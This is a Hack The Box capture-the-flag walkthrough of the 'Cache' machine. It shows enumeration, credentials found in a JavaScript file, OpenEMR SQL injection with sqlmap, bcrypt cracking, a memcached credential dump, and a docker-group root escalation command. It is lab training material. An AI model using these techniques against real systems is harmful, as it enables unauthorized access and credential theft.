Hack The Box - Cache


We are going to pwn Cache from Hack The Box.

Link: https://www.hackthebox.eu/home/machines/profile/251

Let’s Begin with our Initial Nmap Scan.

Nmap Scan Results:

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


It’s an normal webpage, It contains information about Hacking. Nothing Much.


There is a login page for us. Before Trying any SQLi, I decided to run GoBuster.


GoBuster Scan Results:

Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/05/19 09:30:09 Starting gobuster
/javascript (Status: 301)
/jquery (Status: 301)
/server-status (Status: 403)
2020/05/19 10:58:27 Finished

/jquery There is a js file.


This file reveals the username and password of the login page.

    var error_correctPassword = false;
    var error_username = false;
    function checkCorrectPassword(){
        var Password = $("#password").val();
        if(Password != 'H@v3_fun'){
            alert("Password didn't Match");
            error_correctPassword = true;
    function checkCorrectUsername(){
        var Username = $("#username").val();
        if(Username != "ash"){
            alert("Username didn't Match");
            error_username = true;
    $("#loginform").submit(function(event) {
        /* Act on the event */
        error_correctPassword = false;
         error_username = false;

        if(error_correctPassword == false && error_username ==false){
            return true;
            return false;

So Im logged in with ash : H@v3_fun


The page is still UnderConstruction, So DeadEnd.

While checking about the Author, I came to know he have another project like cache and its called HMS so likewise I decided to add hms.htb in /etc/hosts


Its an OpenEMR Login page.


GoBuster Scan Results:

Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:            http://hms.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/05/19 10:53:59 Starting gobuster
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin.php (Status: 200)
/common (Status: 301)
/config (Status: 301)
/contrib (Status: 301)
/controllers (Status: 301)
/custom (Status: 301)
/images (Status: 301)
/index.php (Status: 302)
/interface (Status: 301)
/javascript (Status: 301)
/library (Status: 301)
/LICENSE (Status: 200)
/modules (Status: 301)
/portal (Status: 301)
/public (Status: 301)
/server-status (Status: 403)
/services (Status: 301)
/sites (Status: 301)
/sql (Status: 301)
/templates (Status: 301)
/tests (Status: 301)
/vendor (Status: 301)
2020/05/19 10:55:46 Finished



It reveals the version of the OpenEMR. So I decided to search for exploits.


There is Reference YT link



By following the video,

Fill the details –


Log In

Now Click the Register


Change the URL


Here it throws some MySQL error.


Captured the request in burp


And saved it as request.r, Now time for SQLMap


There are 2 databases but openemr seems interesting.

I dump the tables of the database.



I dump the users_secure

Getting Shell as www-data:


Database: openemr
Table: users_secure
[1 entry]
| id   | salt                           | username      | password                                                     | last_update         | salt_history1 | salt_history2 | password_history1 | password_history2 |
| 1    | $2a$05$l2sTLIG6GTBeyBf7TAKL6A$ | openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. | 2019-11-21 06:38:40 | NULL          | NULL          | NULL              | NULL              |

Cracked the hash using John

root@w0lf:~/CTF/HTB/Boxes/Cache# john --wordlist=/usr/share/wordlists/rockyou.txt hash.john 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx           (?)
1g 0:00:00:00 DONE (2020-05-19 13:41) 1.694g/s 1464p/s 1464c/s 1464C/s caitlin..felipe
Use the "--show" option to display all of the cracked passwords reliably
Session completed


Getting User Ash:

There are 2 users ash and luffy and we already found ash password, so why don’t we try su.

Before doing that make sure you have a stable shell.

ash : H@v3_fun it worked.

www-data@cache:/var/www/hms.htb/public_html$ python3 -c 'import pty; pty.spawn("/bin/sh")'
<html$ python3 -c 'import pty; pty.spawn("/bin/sh")'
$ su ash
su ash
Password: H@v3_fun

ash@cache:/var/www/hms.htb/public_html$ cd /home
cd /home
ash@cache:/home$ cd ash
cd ash
ash@cache:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  user.txt
ash@cache:~$ cat user.txt
cat user.txt

Getting User Luffy:

There is a weird port listening inside the machine. Port 11211

ash@cache:/home$ netstat -tulnp
netstat -tulnp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 *               LISTEN      -                   
tcp        0      0    *               LISTEN      -                      
tcp        0      0*               LISTEN      -                   
tcp        0      0*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
udp        0      0 *                           -

I googled the port and I came to know its memcached

Memcached is a general-purpose distributed memory-caching system.

Reference : https://www.hackingarticles.in/penetration-testing-on-memcached-server/


stats items reveals slab ID 1. So we can dump it using stats cachedump

Here 1 and 0 are the parameters, 1 = slab ID. 0 = It represents the number of keys you want to dump, 0 will dump all the keys present in the slab ID respectively.

I got user luffy password 0n3_p1ec3

ash@cache:/home$ su luffy
su luffy
Password: 0n3_p1ec3

luffy@cache:/home$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)

Privilege Escalation:

I run my Linux Enumeration script and it reveals


That luffy is in group docker.

In this case, the user can run a light container with /etc mounted in and then get root access in the container.

I used GTFOBins and it also tells the same thing the user must be in docker group and it also tell us how to get interactive shell.

I already got the Image ID from my enumeration script so

luffy@cache:/home/ash$ docker run -v /:/mnt --rm -it 2ca708c1c9cc chroot /mnt sh
< run -v /:/mnt --rm -it 2ca708c1c9cc chroot /mnt sh
# whoami
# cd /root
cd /root
# ls
# cat root.txt
cat root.txt

We own the box.